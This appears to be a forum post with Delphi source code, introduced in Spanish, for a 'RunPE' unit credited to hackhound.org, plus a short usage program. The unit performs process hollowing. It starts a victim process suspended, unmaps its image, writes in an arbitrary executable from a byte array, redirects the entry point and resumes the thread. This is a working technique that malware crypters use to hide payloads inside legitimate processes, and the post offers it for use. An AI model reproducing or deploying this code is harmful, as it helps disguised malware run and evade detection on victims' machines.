{ uRunPE Author: Anonymous Description: Run Executables as Byte Arrays Original: http://www.freevbcode.com/ShowCode.asp?ID=8385 Ported by: steve10120 Website: http://hackhound.org History: First try }
Adaptado a delphi desde el codigo original en VB
unit uRunPE; interface uses Windows; type TByteArray = array of Byte; function RunEXE(sVictim:string; bFile:TByteArray):Boolean; function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll'; implementation procedure Move(Destination, Source: Pointer; dLength:Cardinal); begin CopyMemory(Destination, Source, dLength); end; function RunEXE(sVictim:string; bFile:TByteArray):Boolean; var IDH: TImageDosHeader; INH: TImageNtHeaders; ISH: TImageSectionHeader; PI: TProcessInformation; SI: TStartUpInfo; CONT: TContext; ImageBase: Pointer; Ret: DWORD; i: integer; Addr: DWORD; dOffset: DWORD; begin Result := FALSE; try Move(@IDH, @bFile[0], 64); if IDH.e_magic = IMAGE_DOS_SIGNATURE then begin Move(@INH, @bFile[IDH._lfanew], 248); if INH.Signature = IMAGE_NT_SIGNATURE then begin FillChar(SI, SizeOf(TStartupInfo),#0); FillChar(PI, SizeOf(TProcessInformation),#0); SI.cb := SizeOf(TStartupInfo); if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then begin CONT.ContextFlags := CONTEXT_FULL; if GetThreadContext(PI.hThread, CONT) then begin ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret); NtUnmapViewOfSection(PI.hProcess, @Addr); ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret); dOffset := IDH._lfanew + 248; for i := 0 to INH.FileHeader.NumberOfSections - 1 do begin Move(@ISH, @bFile[dOffset + (i * 40)], 40); WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret); VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr); end; WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret); CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint; SetThreadContext(PI.hThread, CONT); ResumeThread(PI.hThread); Result := TRUE; end; end; end; end; except CloseHandle(PI.hProcess); CloseHandle(PI.hThread); end; end; end.
Para usar :
program RunPE; uses Windows, uRunPE in 'uRunPE.pas'; var bBuff: TByteArray; {$R *.res} function FileToBytes(sPath:string; var bFile:TByteArray):Boolean; var hFile: THandle; dSize: DWORD; dRead: DWORD; begin Result := FALSE; hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); if hFile <> INVALID_HANDLE_VALUE then begin dSize := GetFileSize(hFile, nil); SetLength(bFile, dSize); ReadFile(hFile, bFile[0], dSize, dRead, nil); CloseHandle(hFile); if dRead = dSize then Result := TRUE; end; end; begin if FileToBytes('calc.exe', bBuff) then RunExe(ParamStr(0), bBuff); end.